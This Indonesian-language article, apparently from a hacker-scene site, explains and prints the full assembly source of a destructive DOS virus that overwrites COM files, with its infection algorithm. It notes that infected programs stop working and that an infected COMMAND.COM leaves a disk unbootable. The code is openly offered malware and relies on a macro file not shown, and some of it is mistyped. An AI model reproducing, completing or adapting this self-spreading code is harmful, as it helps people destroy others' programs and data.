about virus

Bila dibandingkan dengan virus bacthfile, yang pernah kita bicarakan maka virus yang kita bahas sekarang ini telah memiliki kelima kemampuan


1. Pendahuluan

Virus komputer yang akan dibicarakan dibawah ini ditulis dalam bahasa assembley.Bila dibandingkan dengan virus bacthfile, yang pernah kita bicarakan maka virus yang kita bahas sekarang ini telah memiliki kelima kemampuan seperti apa yang telah saya sampaikan terdahulu.
Virus ini mampu mencari semua file COM yang ada pada disket, serta memeriksanya apakah telah tertular atau belum.Bila belum, maka virus akan menularinya.Routine manipulasi yang dimiliki virus ini hanyalah berupa tampilan pesan :”File ini telah tertular Virus komputer!” atau “Semua file COM pada disket ini telah tertular virus komputer!!!”.
Berbeda dengan virus batchfile yang menghasilkan file baru dan membutuhkan beberapa file untuk menjalankannya, maka virus yang akan kita bahas ini nantinya dapat bekerja sendiri dan tidak menghasilkan file baru, sehingga kemampuan menyembunyikan diri dari virus ini lebih baik.
Seperti halnya virus batchfile, virus dibawah ini adalah termasuk jenis virus yang menumpangi program yang ditularinya.Dengan demikian virus ini bersifat merusak.

2. Algoritma

Algoritma yang digunakan adalah sbb:
1.cari file COM yang pertama
2.buka dan baca file tersebut, letakkan pada buffer (di RAM)
3.Dengan membandingkan tanda pengenal virus dan rangkaian byte bagian awal dari program, periksa apakah file tersebut telah tertular virus atau belum.
4.a) Bila belum, maka tulari file tersebut dengan jalan menyalin seluruh program virus ke file tersebut (menumpangi).Kemudian tampilkan pesan :”File ini telah tertular Virus Komputer !”
b) Bila sudah, maka carilah file COM berikutnya.Ulangi langkah 2.
5.Jika semua file COM telah tertular, maka tampilkan pesan : “semua file Com pada disket ini telah tertular virus komputer!!!”


3. Program dan Mekanisme Penularan

Program dibawah ini merupakan implementasi dari bagian diatas.

Catatan : Program virus ini menggunakan instruksi macro.Definisi macro yang digunakan terdapat pada file LAMMER.MAC.(klo pengen liat file macronya kirim email ke Dr`Ponidi@crackdealer.com)

;------------------------------------------------------------------------------
; LAMMER.ASM
;
;CODE BY : #DEFACE-TEAM@IRC.DAL.NET
; #DHEGLENG@IRC.DAL.NET
;
;RETRIEVAL SYSTEM BY: DR`PONIDI@CRACKDEALER.COM
;
;VIRUS INI MENYERANG DAN MERUSAK SEMUA FILE COM.
;BERHATI-HATILAH!
;------------------------------------------------------------------------------



IF1
INCLUDE LAMMER.MAC
ENDIF
Code_seg SEGMENT
ASSUME CS:Code_seg
ORG 100h
Mulai : jmp kerjakan
Identitas DB `File ini telah tertular virus komputer !$`
Peringatan DB `semua file COM dalam disket ini telah tertular virus`
DB `Komputer !!!$`
File_COM DB`*.com`,0h
Nama_file DB 13 DUP(?)
Panjang_id equ 45
Panjang_vir equ 445
Atribut equ 20h
Open_code equ 2
Jumlah equ 0ffffh
DTA DB43 DUP(20h)

Kerjakan : Set_DTA DTA
Mov ax,0
Find_first file_COM,Atribut
Masih_adakah: cmp ax,0
Je Laksanakan
Cmp ax,2
Je Keluar
Tulis_string peringatan
Jmp Keluar
Keluar : Ke_dos
Laksanakan : mov si,offset DTA + 30
Pindahkan_string 13,nama_file
Buka_file_DTA DTA,Open_code
Push bx
Baca_file bx,Buffer,jumlah
Push ax
Mov di,offset Buffer + 3
Bandingkan-string Identitas,panjang_id
Cmp bx,0
Je Cari_lainnya
Mov si,100h
Pindahkan_string panjang_vir,Buffer
Pop ax
Pop bx
Push ax
Tutup_file bx
Hapus_file Nama_file
Buat_file Nama_file,Atribut
Buka_file Nama_file,Open_code
Pop ax
Tulis_file bx,buffer,ax
Tutup_file bx
Tulis_string identitas
Ke_dos

Cari_lainnya : pop ax
pop bx
Tutup_file bx
Find_next
Jmp masih_adakah
Buffer Label byte
Code_seg ENDS
END mulai



4. Penjelasan

Awal dari penularan dimulai ketika program virus ini dijalankan pada disket yang berisi file-file COM.Virus mula-mula akan menulari file COM yang pertama (berdasarkan urutan file-file pada disket).Dengan penularan ini, maka file tersebut menjadi sumber penularan baru, dan virus yang asli dapat dihapus.File-file yang telah tertular ukurannya tidak berubah.
Bila file yang telah tertular itu dijalankan, maka file itu tidak dapat menjalankan fungsinya dan hanya akan menampilkan pesan :”File ini telah tertular Virus komputer!”.Sebelumnya, file tersebut akan menulari file COM lainnya.
Bila kebetulan file .COM pertama yang diserang didalam directory utama adalah COMMAND.COM, maka setiap kali melakukan boot dengan disket itu, tak akan pernah berhasil dan sebelumnya virus akan menulari sebuah program COM lain yang belum tertular.
Harapa diperhatikan bahwa virus ini tidak dapat bekerja dengan baik bila berada pada file COM yang ukurannya lebih kecil daripada ukuran program virus yang asli, atau terlalu besar (mendekati atau lebih dari FFFF heksadesimal = 64KB)
Ini disebabkan karena program virus tidak dapat disalin secara lengkap atau buffer telah melampaui batas daerah CS (Code Segment)






Demikianlah Artikel yang dapat saya sampaikan pada kesempatan ini, Semoga informasi yang saya sampaikan dapat bermanfaat bagi pengetahuan bagi kita semua ,khususnya bagi yang concern terhadap virus.Sekian terima kasih cao……:) :) :)